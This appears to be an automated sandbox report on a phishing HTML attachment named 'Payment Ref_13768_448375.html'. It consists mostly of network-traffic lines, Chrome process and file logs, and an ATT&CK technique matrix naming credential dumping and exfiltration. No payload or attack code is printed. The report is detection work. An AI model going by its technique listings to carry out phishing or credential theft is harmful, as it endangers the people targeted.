    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63628
    Source: unknownNetwork traffic detected: HTTP traffic on port 63544 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64566 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63621
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63620
    Source: unknownNetwork traffic detected: HTTP traffic on port 63638 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63623
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63622
    Source: unknownNetwork traffic detected: HTTP traffic on port 63997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63462 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63683 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63636
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63635
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63638
    Source: unknownNetwork traffic detected: HTTP traffic on port 63765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63637
    Source: unknownNetwork traffic detected: HTTP traffic on port 63417 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63639
    Source: unknownNetwork traffic detected: HTTP traffic on port 63380 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63630
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63632
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63631
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63634
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63633
    Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64473 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64427 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64460
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64462
    Source: unknownNetwork traffic detected: HTTP traffic on port 63457 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64461
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64485 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64382 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64453
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64452
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64455
    Source: unknownNetwork traffic detected: HTTP traffic on port 63617 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64454
    Source: unknownNetwork traffic detected: HTTP traffic on port 64084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64457
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64456
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64459
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64458
    Source: unknownNetwork traffic detected: HTTP traffic on port 64256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64471
    Source: unknownNetwork traffic detected: HTTP traffic on port 64531 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64394 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64470
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64473
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64472
    Source: unknownNetwork traffic detected: HTTP traffic on port 64313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64464
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64463
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64466
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64465
    Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64468
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64467
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64469
    Source: unknownNetwork traffic detected: HTTP traffic on port 60214 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64480
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64482
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64481
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64000
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64484
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64483
    Source: unknownNetwork traffic detected: HTTP traffic on port 64072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64370 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64599 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63548 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64543 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63605 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64475
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64474
    Source: unknownNetwork traffic detected: HTTP traffic on port 64027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64477
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64476
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64479
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64478
    Source: unknownNetwork traffic detected: HTTP traffic on port 63789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64600 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64491
    Source: unknownNetwork traffic detected: HTTP traffic on port 63433 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64490
    Source: unknownNetwork traffic detected: HTTP traffic on port 64497 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64493
    Source: unknownNetwork traffic detected: HTTP traffic on port 64506 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64492
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64495
    Source: unknownNetwork traffic detected: HTTP traffic on port 63733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64494
    Source: unknownNetwork traffic detected: HTTP traffic on port 64220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64009
    Source: unknownNetwork traffic detected: HTTP traffic on port 63469 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64486
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64485
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64488
    Source: unknownNetwork traffic detected: HTTP traffic on port 63698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64003
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64487
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64006
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64489
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64007
    Source: unknownNetwork traffic detected: HTTP traffic on port 64177 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63571
    Source: unknownNetwork traffic detected: HTTP traffic on port 63482 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63570
    Source: unknownNetwork traffic detected: HTTP traffic on port 64337 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64612 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63642 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64417
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63569
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64416
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64419
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64418
    Source: unknownNetwork traffic detected: HTTP traffic on port 63745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63562
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63561
    Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63564
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.5:63391 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:63424 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:63475 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:63578 version: TLS 1.2

    System Summary

    barindex
    Source: Name includes: Payment Ref_13768_448375.htmlInitial sample: payment
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\sets.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\manifest.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\LICENSEJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\_metadata\Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\_metadata\verified_contents.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6200_1272423254\manifest.fingerprintJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_6200_106545729Jump to behavior
    Source: classification engineClassification label: mal72.phis.winHTML@41/1568@128/74
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment Ref_13768_448375.html"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3268 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3268 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Binary string: c.pdb_observe(g)}function d(){c&&g&&(c.pdb_unobserve(g),g=null)}var e=k,c=null,g=null,n=m.init(l);this.setAsin=function(e,l){l=l||{};d();c=f.get(e);a(c,l);c.loading&&b(function(b){a(b,l)});return c};this.clear=function(){d();c={};m.update(n,c)}}});g.P&&n.when("jQuery","afterLoad").register("gw-resource-logger",function(f){return{instrumentResources:function(m){var k;k=!1;if(f.isArray(m)&&!f.isEmptyObject(m)){k=!0;for(var h=0;h<m.length;h++){var l=m[h];if("id"in l&&"regex"in l&&"initiator"in l){if(!("string"=== source: chromecache_692.2.dr, chromecache_1088.2.dr
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    Source: chromecache_1207.2.drBinary or memory string: <a data-routing="" class="a-link-normal s-navigation-item" tabindex="-1" href="/s?k=toys&amp;rh=n%3A11497802031%2Cp_6%3AA2QUTRSO1ZHRN9&amp;dc&amp;_encoding=UTF8&amp;content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&amp;crid=33DY8CRTKE0JW&amp;pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&amp;pd_rd_w=vdKJ7&amp;pd_rd_wg=vThym&amp;pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&amp;pf_rd_r=APAVCQJMFK78QJEV1PMZ&amp;qid=1724264932&amp;rnid=12407979031&amp;sprefix=toy%2Caps%2C204&amp;ref=sr_nr_p_6_1&amp;ds=v1%3AnI3gixtx4SqeMukzS8BQRPNbnLC4%2FC6WW9Przy27Z2E">
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File Deletion
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.